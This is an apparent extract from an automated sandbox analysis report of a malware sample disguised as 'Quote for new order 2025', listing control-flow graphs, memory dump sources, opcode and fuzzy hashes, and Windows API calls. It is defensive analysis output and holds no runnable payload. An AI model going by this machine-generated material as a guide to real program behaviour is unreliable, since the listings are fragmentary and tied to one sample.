                                                                                                                                                        control_flow_graph 3009 9e5f831-9e5f868 3011 9e5f86e-9e5f882 3009->3011 3012 9e5fc99 3009->3012 3013 9e5f884-9e5f8ae 3011->3013 3014 9e5f8b1-9e5f8d0 3011->3014 3015 9e5fc9e-9e5fcb4 3012->3015 3013->3014 3021 9e5f8d2-9e5f8d8 3014->3021 3022 9e5f8e8-9e5f8ea 3014->3022 3026 9e5f8dc-9e5f8de 3021->3026 3027 9e5f8da 3021->3027 3023 9e5f8ec-9e5f904 3022->3023 3024 9e5f909-9e5f912 3022->3024 3023->3015 3028 9e5f91a-9e5f921 3024->3028 3026->3022 3027->3022 3029 9e5f923-9e5f929 3028->3029 3030 9e5f92b-9e5f932 3028->3030 3031 9e5f93f-9e5f953 3029->3031 3032 9e5f934-9e5f93a 3030->3032 3033 9e5f93c 3030->3033 3109 9e5f955 call 9e5fd40 3031->3109 3110 9e5f955 call 9e5fd38 3031->3110 3032->3031 3033->3031 3034 9e5f95a-9e5f95c 3035 9e5fab1-9e5fab5 3034->3035 3036 9e5f962-9e5f969 3034->3036 3037 9e5fc84-9e5fc97 3035->3037 3038 9e5fabb-9e5fabf 3035->3038 3036->3012 3039 9e5f96f-9e5f9ac 3036->3039 3037->3015 3040 9e5fac1-9e5fad4 3038->3040 3041 9e5fad9-9e5fae2 3038->3041 3047 9e5f9b2-9e5f9b7 3039->3047 3048 9e5fc7a-9e5fc7e 3039->3048 3040->3015 3042 9e5fae4-9e5fb0e 3041->3042 3043 9e5fb11-9e5fb18 3041->3043 3042->3043 3045 9e5fbb7-9e5fbcc 3043->3045 3046 9e5fb1e-9e5fb25 3043->3046 3045->3048 3062 9e5fbd2-9e5fbd4 3045->3062 3052 9e5fb54-9e5fb76 3046->3052 3053 9e5fb27-9e5fb51 3046->3053 3049 9e5f9e9-9e5f9fe call 9e5d4c8 3047->3049 3050 9e5f9b9-9e5f9c7 call 9e5d4b0 3047->3050 3048->3028 3048->3037 3060 9e5fa03-9e5fa07 3049->3060 3050->3049 3063 9e5f9c9-9e5f9e2 call 9e5d4bc 3050->3063 3052->3045 3087 9e5fb78-9e5fb82 3052->3087 3053->3052 3064 9e5fa09-9e5fa1b call 9e5d4d4 3060->3064 3065 9e5fa78-9e5fa85 3060->3065 3066 9e5fbd6-9e5fc0f 3062->3066 3067 9e5fc21-9e5fc3e 3062->3067 3072 9e5f9e7 3063->3072 3091 9e5fa1d-9e5fa4d 3064->3091 3092 9e5fa5b-9e5fa73 3064->3092 3065->3048 3079 9e5fa8b-9e5fa95 call 9e5d4e4 3065->3079 3082 9e5fc11-9e5fc17 3066->3082 3083 9e5fc18-9e5fc1f 3066->3083 3067->3048 3078 9e5fc40-9e5fc6c WaitMessage 3067->3078 3072->3060 3084 9e5fc73 3078->3084 3085 9e5fc6e 3078->3085 3093 9e5faa4-9e5faa7 call 9e5d4fc 3079->3093 3094 9e5fa97-9e5fa9a call 9e5d4f0 3079->3094 3082->3083 3083->3048 3084->3048 3085->3084 3099 9e5fb84-9e5fb8a 3087->3099 3100 9e5fb9a-9e5fbb5 3087->3100 3104 9e5fa54 3091->3104 3105 9e5fa4f 3091->3105 3092->3015 3101 9e5faac 3093->3101 3106 9e5fa9f 3094->3106 3102 9e5fb8c 3099->3102 3103 9e5fb8e-9e5fb90 3099->3103 3100->3045 3100->3087 3101->3048 3102->3100 3103->3100 3104->3092 3105->3104 3106->3048 3109->3034 3110->3034
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 00000000.00000002.3544688384.0000000009E50000.00000040.00000800.00020000.00000000.sdmp, Offset: 09E50000, based on PE: false
                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                        • Snapshot File: hcaresult_0_2_9e50000_Quote for new order 2025.jbxd
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID:
                                                                                                                                                        • String ID:
                                                                                                                                                        • API String ID:
                                                                                                                                                        • Opcode ID: ffdeed60390af7d3210f45ed46f435b94cc2174ff64220e437c7f15c9fe63fef
                                                                                                                                                        • Instruction ID: 3aa34c36f380a46449f2df9b4aa903fb667017620a4ab1addacb7bc2d6723060
                                                                                                                                                        • Opcode Fuzzy Hash: ffdeed60390af7d3210f45ed46f435b94cc2174ff64220e437c7f15c9fe63fef
                                                                                                                                                        • Instruction Fuzzy Hash: 1ED15C30A00209DFDB14DFA5C948BADBBF1BF44308F159969E816AF2A5DB70ED85CB40
                                                                                                                                                        Function 0798CE30 Relevance: .6, Instructions: 635COMMON
                                                                                                                                                        Download Yara Rule
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 00000000.00000002.3542821888.0000000007980000.00000040.00000800.00020000.00000000.sdmp, Offset: 07980000, based on PE: false
                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                        • Snapshot File: hcaresult_0_2_7980000_Quote for new order 2025.jbxd
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID:
                                                                                                                                                        • String ID:
                                                                                                                                                        • API String ID:
                                                                                                                                                        • Opcode ID: 7d93d91bb7751066665780c127af73291966c57f15a47cf9db56a367673e1761
                                                                                                                                                        • Instruction ID: 180395c039f84214c4c096c3b4b1d2eda45e5dcc8926a8d96023616a827aebea
                                                                                                                                                        • Opcode Fuzzy Hash: 7d93d91bb7751066665780c127af73291966c57f15a47cf9db56a367673e1761
                                                                                                                                                        • Instruction Fuzzy Hash: D6525F71A1061ACFCB51EF74C854AE9B7B5FF89304F1485D9E409AB2A1DB71EA82CF40
                                                                                                                                                        Function 09E064E8 Relevance: .4, Instructions: 373COMMON
                                                                                                                                                        Download Yara Rule
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 00000000.00000002.3544623404.0000000009E00000.00000040.00000800.00020000.00000000.sdmp, Offset: 09E00000, based on PE: false
                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                        • Snapshot File: hcaresult_0_2_9e00000_Quote for new order 2025.jbxd
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID:
                                                                                                                                                        • String ID:
                                                                                                                                                        • API String ID:
                                                                                                                                                        • Opcode ID: e01f5a681dd3bef8aed9a7c59c031e8b2c41a1d8ee0827d47a82a3da8683aec4
                                                                                                                                                        • Instruction ID: cb07969d70337660df8c0800d446f7b7a2fc2e93a08a64530b422048b321d39b
                                                                                                                                                        • Opcode Fuzzy Hash: e01f5a681dd3bef8aed9a7c59c031e8b2c41a1d8ee0827d47a82a3da8683aec4
                                                                                                                                                        • Instruction Fuzzy Hash: 8B029274A01219CFDB68DF64D994BADB7B2FF89304F2090A9D509AB361DB31AD85CF10
                                                                                                                                                        Function 07989800 Relevance: .3, Instructions: 281COMMON
                                                                                                                                                        Download Yara Rule
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 00000000.00000002.3542821888.0000000007980000.00000040.00000800.00020000.00000000.sdmp, Offset: 07980000, based on PE: false
                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                        • Snapshot File: hcaresult_0_2_7980000_Quote for new order 2025.jbxd
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID:
                                                                                                                                                        • String ID:
                                                                                                                                                        • API String ID:
                                                                                                                                                        • Opcode ID: e2dc1cd94ab8484c4eadc78de89c25883127bbad9e31ed621ababd013568adcd
                                                                                                                                                        • Instruction ID: 4723031a217c6ea3ad716f37a5676d305b20f6f3f03c625ac6401f58d3685912
                                                                                                                                                        • Opcode Fuzzy Hash: e2dc1cd94ab8484c4eadc78de89c25883127bbad9e31ed621ababd013568adcd
                                                                                                                                                        • Instruction Fuzzy Hash: BFB150B0E0020ACFDB50DFA9D9857ADBBF6BF88318F148129D455EB354EB74A845CB81
                                                                                                                                                        Function 0798A0D0 Relevance: .3, Instructions: 266COMMON
                                                                                                                                                        Download Yara Rule
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 00000000.00000002.3542821888.0000000007980000.00000040.00000800.00020000.00000000.sdmp, Offset: 07980000, based on PE: false
                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                        • Snapshot File: hcaresult_0_2_7980000_Quote for new order 2025.jbxd
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID:
                                                                                                                                                        • String ID:
                                                                                                                                                        • API String ID:
                                                                                                                                                        • Opcode ID: 2ab09e7781bfe74df715b2b6555af379faa8de864a0046c0488ba98e9f1d9721
                                                                                                                                                        • Instruction ID: 0b7ccbe568a059057fba3d7dbd98effb8f509b21c0ee9c03085a012549025822
                                                                                                                                                        • Opcode Fuzzy Hash: 2ab09e7781bfe74df715b2b6555af379faa8de864a0046c0488ba98e9f1d9721
                                                                                                                                                        • Instruction Fuzzy Hash: FCB16CB0E0020ACFDB50DFA9D88179DBBF6EF88318F14C52AD415EB294EB749845CB81
                                                                                                                                                        Function 01557530 Relevance: 6.1, APIs: 4, Instructions: 136threadCOMMON
                                                                                                                                                        Download Yara Rule

                                                                                                                                                        Control-flow Graph

                                                                                                                                                        • Executed
                                                                                                                                                        • Not Executed
                                                                                                                                                        control_flow_graph 1509 1557530-15575cf GetCurrentProcess 1514 15575d1-15575d7 1509->1514 1515 15575d8-155760c GetCurrentThread 1509->1515 1514->1515 1516 1557615-1557649 GetCurrentProcess 1515->1516 1517 155760e-1557614 1515->1517 1519 1557652-155766d call 155770f 1516->1519 1520 155764b-1557651 1516->1520 1517->1516 1523 1557673-15576a2 GetCurrentThreadId 1519->1523 1520->1519 1524 15576a4-15576aa 1523->1524 1525 15576ab-155770d 1523->1525 1524->1525
                                                                                                                                                        APIs
                                                                                                                                                        • GetCurrentProcess.KERNEL32 ref: 015575BE
                                                                                                                                                        • GetCurrentThread.KERNEL32 ref: 015575FB
                                                                                                                                                        • GetCurrentProcess.KERNEL32 ref: 01557638
                                                                                                                                                        • GetCurrentThreadId.KERNEL32 ref: 01557691
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 00000000.00000002.3528929042.0000000001550000.00000040.00000800.00020000.00000000.sdmp, Offset: 01550000, based on PE: false
                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                        • Snapshot File: hcaresult_0_2_1550000_Quote for new order 2025.jbxd
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID: Current$ProcessThread
                                                                                                                                                        • String ID:
                                                                                                                                                        • API String ID: 2063062207-0
                                                                                                                                                        • Opcode ID: 9febd8c4392317245ca0b4df50027b5e13e60b8ac99cab0782f9fd23a166c296
                                                                                                                                                        • Instruction ID: f2c24080119c061f76f3236d2f084ac5ff4fc9fe277348dacbd765b2acb65c4c
                                                                                                                                                        • Opcode Fuzzy Hash: 9febd8c4392317245ca0b4df50027b5e13e60b8ac99cab0782f9fd23a166c296
                                                                                                                                                        • Instruction Fuzzy Hash: 9F5164B09003498FDB44DFAAD548BDEBFF1BB49314F20845AD408AB3A1DB34A984CF65
                                                                                                                                                        Function 01557540 Relevance: 6.1, APIs: 4, Instructions: 128threadCOMMON
                                                                                                                                                        Download Yara Rule

                                                                                                                                                        Control-flow Graph

                                                                                                                                                        • Executed
                                                                                                                                                        • Not Executed
                                                                                                                                                        control_flow_graph 1532 1557540-15575cf GetCurrentProcess 1536 15575d1-15575d7 1532->1536 1537 15575d8-155760c GetCurrentThread 1532->1537 1536->1537 1538 1557615-1557649 GetCurrentProcess 1537->1538 1539 155760e-1557614 1537->1539 1541 1557652-155766d call 155770f 1538->1541 1542 155764b-1557651 1538->1542 1539->1538 1545 1557673-15576a2 GetCurrentThreadId 1541->1545 1542->1541 1546 15576a4-15576aa 1545->1546 1547 15576ab-155770d 1545->1547 1546->1547
                                                                                                                                                        APIs
                                                                                                                                                        • GetCurrentProcess.KERNEL32 ref: 015575BE
                                                                                                                                                        • GetCurrentThread.KERNEL32 ref: 015575FB
                                                                                                                                                        • GetCurrentProcess.KERNEL32 ref: 01557638
                                                                                                                                                        • GetCurrentThreadId.KERNEL32 ref: 01557691
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 00000000.00000002.3528929042.0000000001550000.00000040.00000800.00020000.00000000.sdmp, Offset: 01550000, based on PE: false
                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                        • Snapshot File: hcaresult_0_2_1550000_Quote for new order 2025.jbxd
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID: Current$ProcessThread
                                                                                                                                                        • String ID:
                                                                                                                                                        • API String ID: 2063062207-0
                                                                                                                                                        • Opcode ID: 80a57ba6e6972e6c3441eed3ee1b90640466741e0fe605cb73b6df5897f3ca56
                                                                                                                                                        • Instruction ID: 6f76f1a21ba2c45635c31833ccfe5b51c5f2286b1931b968e048877ac281026a
                                                                                                                                                        • Opcode Fuzzy Hash: 80a57ba6e6972e6c3441eed3ee1b90640466741e0fe605cb73b6df5897f3ca56
                                                                                                                                                        • Instruction Fuzzy Hash: A15143B09007498FDB54DFAAD548BDEBBF1BB48314F20C45AD419AB360DB34A984CF65
                                                                                                                                                        Function 0155D4C8 Relevance: 1.7, APIs: 1, Instructions: 205COMMON
                                                                                                                                                        Download Yara Rule

                                                                                                                                                        Control-flow Graph

                                                                                                                                                        • Executed
                                                                                                                                                        • Not Executed
                                                                                                                                                        control_flow_graph 3111 155d4c8-155d4e7 3112 155d513-155d517 3111->3112 3113 155d4e9-155d4f6 call 155c374 3111->3113 3115 155d519-155d523 3112->3115 3116 155d52b-155d56c 3112->3116 3119 155d50c 3113->3119 3120 155d4f8-155d506 call 155d770 3113->3120 3115->3116 3122 155d56e-155d576 3116->3122 3123 155d579-155d587 3116->3123 3119->3112 3120->3119 3129 155d648-155d708 3120->3129 3122->3123 3124 155d589-155d58e 3123->3124 3125 155d5ab-155d5ad 3123->3125 3127 155d590-155d597 call 155c380 3124->3127 3128 155d599 3124->3128 3130 155d5b0-155d5b7 3125->3130 3132 155d59b-155d5a9 3127->3132 3128->3132 3161 155d710-155d73b GetModuleHandleW 3129->3161 3162 155d70a-155d70d 3129->3162 3133 155d5c4-155d5cb 3130->3133 3134 155d5b9-155d5c1 3130->3134 3132->3130 3135 155d5cd-155d5d5 3133->3135 3136 155d5d8-155d5e1 call 155c390 3133->3136 3134->3133 3135->3136 3142 155d5e3-155d5eb 3136->3142 3143 155d5ee-155d5f3 3136->3143 3142->3143 3144 155d5f5-155d5fc 3143->3144 3145 155d611-155d618 call 155da50 3143->3145 3144->3145 3147 155d5fe-155d60e call 155c148 call 155c3a0 3144->3147 3150 155d61b-155d61e 3145->3150 3147->3145 3152 155d641-155d647 3150->3152 3153 155d620-155d63e 3150->3153 3153->3152 3163 155d744-155d758 3161->3163 3164 155d73d-155d743 3161->3164 3162->3161 3164->3163
                                                                                                                                                        APIs
                                                                                                                                                        • GetModuleHandleW.KERNEL32(00000000), ref: 0155D72E
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 00000000.00000002.3528929042.0000000001550000.00000040.00000800.00020000.00000000.sdmp, Offset: 01550000, based on PE: false
                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                        • Snapshot File: hcaresult_0_2_1550000_Quote for new order 2025.jbxd
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID: HandleModule
                                                                                                                                                        • String ID:
                                                                                                                                                        • API String ID: 4139908857-0
                                                                                                                                                        • Opcode ID: 8045047f6de761102e1ae71963a80f61b206d61cb6eec7be24f274b20c8e1c8b
                                                                                                                                                        • Instruction ID: 909d8b764aefdbba38b371763445a15eea7a92473e9503ff75bb9e2088ce7536
                                                                                                                                                        • Opcode Fuzzy Hash: 8045047f6de761102e1ae71963a80f61b206d61cb6eec7be24f274b20c8e1c8b
                                                                                                                                                        • Instruction Fuzzy Hash: 3A814671A00B058FDB65DF6AD45479ABBF1FF88304F00892ED486CBA50D774E945CB91
                                                                                                                                                        Function 0155FAD0 Relevance: 1.6, APIs: 1, Instructions: 113COMMON
                                                                                                                                                        Download Yara Rule
                                                                                                                                                        APIs
                                                                                                                                                        • CreateWindowExW.USER32(?,?,?,?,?,?,0000000C,?,?,?,?,?), ref: 0155FBE2
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 00000000.00000002.3528929042.0000000001550000.00000040.00000800.00020000.00000000.sdmp, Offset: 01550000, based on PE: false
                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                        • Snapshot File: hcaresult_0_2_1550000_Quote for new order 2025.jbxd
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID: CreateWindow
                                                                                                                                                        • String ID:
                                                                                                                                                        • API String ID: 716092398-0
                                                                                                                                                        • Opcode ID: 275e27672d6ff092af48e3c003f0dcfdea5e1ed0dab99b0a95d1cb06c40a72ec
                                                                                                                                                        • Instruction ID: 56077337726a593b0be055e51485670bbd98881ac3b25f308c8daffd458fc3c7
                                                                                                                                                        • Opcode Fuzzy Hash: 275e27672d6ff092af48e3c003f0dcfdea5e1ed0dab99b0a95d1cb06c40a72ec
                                                                                                                                                        • Instruction Fuzzy Hash: 7A41BDB1D00309DFDB14CFAAC894ADEBBB5FF48310F24852AE819AB210D7749885CF91
                                                                                                                                                        Function 09E5FD38 Relevance: 1.6, APIs: 1, Instructions: 93windowCOMMON
                                                                                                                                                        Download Yara Rule
                                                                                                                                                        APIs
                                                                                                                                                        • PeekMessageW.USER32(?,?,?,?,?), ref: 09E5FDA8
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 00000000.00000002.3544688384.0000000009E50000.00000040.00000800.00020000.00000000.sdmp, Offset: 09E50000, based on PE: false
                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                        • Snapshot File: hcaresult_0_2_9e50000_Quote for new order 2025.jbxd
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID: MessagePeek
                                                                                                                                                        • String ID:
                                                                                                                                                        • API String ID: 2222842502-0
                                                                                                                                                        • Opcode ID: 86dca6bd56ce9328b5846eb29569aca96a630a989c771941d9662379dc52b44c
                                                                                                                                                        • Instruction ID: 987ae72662aeb934825f03f094c751a1cfafc6af0cd6f16b2e608d4e863b9550
                                                                                                                                                        • Opcode Fuzzy Hash: 86dca6bd56ce9328b5846eb29569aca96a630a989c771941d9662379dc52b44c
                                                                                                                                                        • Instruction Fuzzy Hash: 0A2138B1900249DFCB10CF9AC885BDEBBF4EB48310F04846AE955A7651C3789944CFA5
                                                                                                                                                        Function 09E524EC Relevance: 1.6, APIs: 1, Instructions: 72COMMON
                                                                                                                                                        Download Yara Rule
                                                                                                                                                        APIs
                                                                                                                                                        • DrawTextExW.USER32(?,?,?,?,?,?,?,?,?,?,?,?,?,09E53655,?,?), ref: 09E53707
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 00000000.00000002.3544688384.0000000009E50000.00000040.00000800.00020000.00000000.sdmp, Offset: 09E50000, based on PE: false
                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                        • Snapshot File: hcaresult_0_2_9e50000_Quote for new order 2025.jbxd
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID: DrawText
                                                                                                                                                        • String ID:
                                                                                                                                                        • API String ID: 2175133113-0
                                                                                                                                                        • Opcode ID: f20e895af5db7a568854188463a1edb6066a3747f40b14c9305d45517dd3697d
                                                                                                                                                        • Instruction ID: 536aea6a3dee8537f7fd1a5e56511b727693d795a8a5802ebebd7965ef8a3908
                                                                                                                                                        • Opcode Fuzzy Hash: f20e895af5db7a568854188463a1edb6066a3747f40b14c9305d45517dd3697d
                                                                                                                                                        • Instruction Fuzzy Hash: B231E4B5D00209DFDB14CF9AD884ADEBBF4EB48364F14942AE915A7310D774A940CFA4
                                                                                                                                                        Function 09E53668 Relevance: 1.6, APIs: 1, Instructions: 71COMMON
                                                                                                                                                        Download Yara Rule
                                                                                                                                                        APIs
                                                                                                                                                        • DrawTextExW.USER32(?,?,?,?,?,?,?,?,?,?,?,?,?,09E53655,?,?), ref: 09E53707
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 00000000.00000002.3544688384.0000000009E50000.00000040.00000800.00020000.00000000.sdmp, Offset: 09E50000, based on PE: false
                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                        • Snapshot File: hcaresult_0_2_9e50000_Quote for new order 2025.jbxd
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID: DrawText
                                                                                                                                                        • String ID:
                                                                                                                                                        • API String ID: 2175133113-0
                                                                                                                                                        • Opcode ID: 569a4154b66ca7d2a097a1bd3ab3d201f372656d0e80ffcb4b0970d91acd3105
                                                                                                                                                        • Instruction ID: 9b3e2bff3955ab4b96f3f5f9a0c0493666c65730c7991f64968610d8c0928ea7
                                                                                                                                                        • Opcode Fuzzy Hash: 569a4154b66ca7d2a097a1bd3ab3d201f372656d0e80ffcb4b0970d91acd3105
                                                                                                                                                        • Instruction Fuzzy Hash: 1231E4B5D00249DFDB14CF99D884A9EFBF5BF48314F14842AE815A7220D374A944CFA0
                                                                                                                                                        Function 01557780 Relevance: 1.6, APIs: 1, Instructions: 66COMMON
                                                                                                                                                        Download Yara Rule
                                                                                                                                                        APIs
                                                                                                                                                        • DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?), ref: 0155780F
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 00000000.00000002.3528929042.0000000001550000.00000040.00000800.00020000.00000000.sdmp, Offset: 01550000, based on PE: false
                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                        • Snapshot File: hcaresult_0_2_1550000_Quote for new order 2025.jbxd
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID: DuplicateHandle
                                                                                                                                                        • String ID:
                                                                                                                                                        • API String ID: 3793708945-0
                                                                                                                                                        • Opcode ID: 4aaff988c24add6e512f81a8ca6f7a16c3b07065adfe7d7963bb309e9244817e
                                                                                                                                                        • Instruction ID: 6ba5e51807b12c0132c9065aef483dda7e220bf92c12ec7575f9e1ce27d9c854
                                                                                                                                                        • Opcode Fuzzy Hash: 4aaff988c24add6e512f81a8ca6f7a16c3b07065adfe7d7963bb309e9244817e
                                                                                                                                                        • Instruction Fuzzy Hash: 0A2105B59002489FDB10CFAAD884ADEBFF4FB48320F14841AE914A7350D378A940CFA4
                                                                                                                                                        Function 09E5F380 Relevance: 1.6, APIs: 1, Instructions: 64windowCOMMON
                                                                                                                                                        Download Yara Rule
                                                                                                                                                        APIs
                                                                                                                                                        • PostMessageW.USER32(?,?,?,?), ref: 09E5F405
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 00000000.00000002.3544688384.0000000009E50000.00000040.00000800.00020000.00000000.sdmp, Offset: 09E50000, based on PE: false
                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                        • Snapshot File: hcaresult_0_2_9e50000_Quote for new order 2025.jbxd
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID: MessagePost
                                                                                                                                                        • String ID:
                                                                                                                                                        • API String ID: 410705778-0
                                                                                                                                                        • Opcode ID: 06709e8dcd6f99cb1fddd4daa923c86382ee4f4132577edd64b7831a0fd5ae57
                                                                                                                                                        • Instruction ID: 864f6d6a69306ca5e2065d712cd84f5c44eda1fa3a8ce43691841b4afa863299
                                                                                                                                                        • Opcode Fuzzy Hash: 06709e8dcd6f99cb1fddd4daa923c86382ee4f4132577edd64b7831a0fd5ae57
                                                                                                                                                        • Instruction Fuzzy Hash: F6216D718083898FCB11CFA9C845BDEBFF4EB0A210F14849AD854E7262C378A945CBA5
                                                                                                                                                        Function 01557788 Relevance: 1.6, APIs: 1, Instructions: 62COMMON
                                                                                                                                                        Download Yara Rule
                                                                                                                                                        APIs
                                                                                                                                                        • DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?), ref: 0155780F
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 00000000.00000002.3528929042.0000000001550000.00000040.00000800.00020000.00000000.sdmp, Offset: 01550000, based on PE: false
                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                        • Snapshot File: hcaresult_0_2_1550000_Quote for new order 2025.jbxd
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID: DuplicateHandle
                                                                                                                                                        • String ID:
                                                                                                                                                        • API String ID: 3793708945-0
                                                                                                                                                        • Opcode ID: 6226629d5ca235457b144369b75e083815045d3431b973e481af9672bcd3ab23
                                                                                                                                                        • Instruction ID: e149073c8264568143a82d9dddb4ff6ae80b7277f109ce5e21ef2bc3df8a8c24
                                                                                                                                                        • Opcode Fuzzy Hash: 6226629d5ca235457b144369b75e083815045d3431b973e481af9672bcd3ab23
                                                                                                                                                        • Instruction Fuzzy Hash: 6121E4B5D002089FDB10CFAAD984ADEBFF4FB48320F14841AE914A7350D374A944CFA4
                                                                                                                                                        Function 09E00908 Relevance: 1.6, APIs: 1, Instructions: 59windowCOMMON
                                                                                                                                                        Download Yara Rule
                                                                                                                                                        APIs
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 00000000.00000002.3544623404.0000000009E00000.00000040.00000800.00020000.00000000.sdmp, Offset: 09E00000, based on PE: false
                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                        • Snapshot File: hcaresult_0_2_9e00000_Quote for new order 2025.jbxd
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID: DispatchMessage
                                                                                                                                                        • String ID:
                                                                                                                                                        • API String ID: 2061451462-0
                                                                                                                                                        • Opcode ID: 1b85b169b1bdfba5b7096702e4b68ef56d0da7ad01275406910c4bdc8f705ff1
                                                                                                                                                        • Instruction ID: a3faedad0635b4a5b4ebd6853c5df23062fc816e5f90acd32745f0d80084cb74
                                                                                                                                                        • Opcode Fuzzy Hash: 1b85b169b1bdfba5b7096702e4b68ef56d0da7ad01275406910c4bdc8f705ff1
                                                                                                                                                        • Instruction Fuzzy Hash: 262124B1D006598FDB10CF9AD4457DEFBF4EB88324F10806AD458A3250D338A645CFA5
                                                                                                                                                        Function 09E5FD40 Relevance: 1.6, APIs: 1, Instructions: 52windowCOMMON
                                                                                                                                                        Download Yara Rule
                                                                                                                                                        APIs
                                                                                                                                                        • PeekMessageW.USER32(?,?,?,?,?), ref: 09E5FDA8
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 00000000.00000002.3544688384.0000000009E50000.00000040.00000800.00020000.00000000.sdmp, Offset: 09E50000, based on PE: false
                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                        • Snapshot File: hcaresult_0_2_9e50000_Quote for new order 2025.jbxd
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID: MessagePeek
                                                                                                                                                        • String ID:
                                                                                                                                                        • API String ID: 2222842502-0
                                                                                                                                                        • Opcode ID: f15f5faaeab7cd99f16a4ec65e852ad49be930fe2b142ae44f563bac64b34c8c
                                                                                                                                                        • Instruction ID: 6d73f35b920419e8c0d3137c22f79955056ef61faf518f050de634516405a185
                                                                                                                                                        • Opcode Fuzzy Hash: f15f5faaeab7cd99f16a4ec65e852ad49be930fe2b142ae44f563bac64b34c8c
                                                                                                                                                        • Instruction Fuzzy Hash: ED1107B5800249DFDB10CF9AD585BDEFBF8EB48320F10842AE959A3251C378A944CFA5
                                                                                                                                                        Function 09E5F3A8 Relevance: 1.5, APIs: 1, Instructions: 48windowCOMMON
                                                                                                                                                        Download Yara Rule
                                                                                                                                                        APIs
                                                                                                                                                        • PostMessageW.USER32(?,?,?,?), ref: 09E5F405
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 00000000.00000002.3544688384.0000000009E50000.00000040.00000800.00020000.00000000.sdmp, Offset: 09E50000, based on PE: false
                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                        • Snapshot File: hcaresult_0_2_9e50000_Quote for new order 2025.jbxd
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID: MessagePost
                                                                                                                                                        • String ID:
                                                                                                                                                        • API String ID: 410705778-0
                                                                                                                                                        • Opcode ID: 03d72e3235edf9710687004df98f493eabe1726e30f25e9950b59e2f1adcb840
                                                                                                                                                        • Instruction ID: fe34902d2de3eba459b5612f7d19df649808f8545afb3cf6f1cf668c24b5436a
                                                                                                                                                        • Opcode Fuzzy Hash: 03d72e3235edf9710687004df98f493eabe1726e30f25e9950b59e2f1adcb840
                                                                                                                                                        • Instruction Fuzzy Hash: F61118B5800349DFDB10CF9AC885BDEFBF8EB48324F108419E954A7251D378A984CFA5
                                                                                                                                                        Function 0155D6C8 Relevance: 1.5, APIs: 1, Instructions: 47COMMON
                                                                                                                                                        Download Yara Rule
                                                                                                                                                        APIs
                                                                                                                                                        • GetModuleHandleW.KERNEL32(00000000), ref: 0155D72E
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 00000000.00000002.3528929042.0000000001550000.00000040.00000800.00020000.00000000.sdmp, Offset: 01550000, based on PE: false
                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                        • Snapshot File: hcaresult_0_2_1550000_Quote for new order 2025.jbxd
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID: HandleModule
                                                                                                                                                        • String ID:
                                                                                                                                                        • API String ID: 4139908857-0
                                                                                                                                                        • Opcode ID: ab929709ea457862d5a3f42ce9d99abcee2da641b763be855512c511df6b23b5
                                                                                                                                                        • Instruction ID: f1e8da4b5f0fa6b1da0bb4905cc004bbc9369c41395341c0bc64d125fd5f958c
                                                                                                                                                        • Opcode Fuzzy Hash: ab929709ea457862d5a3f42ce9d99abcee2da641b763be855512c511df6b23b5
                                                                                                                                                        • Instruction Fuzzy Hash: ED11E0B6C006498FDB14CF9AC444BDEFBF5AB88324F10842AD959A7210D379A545CFA5
                                                                                                                                                        Function 09E00910 Relevance: 1.5, APIs: 1, Instructions: 43windowCOMMON
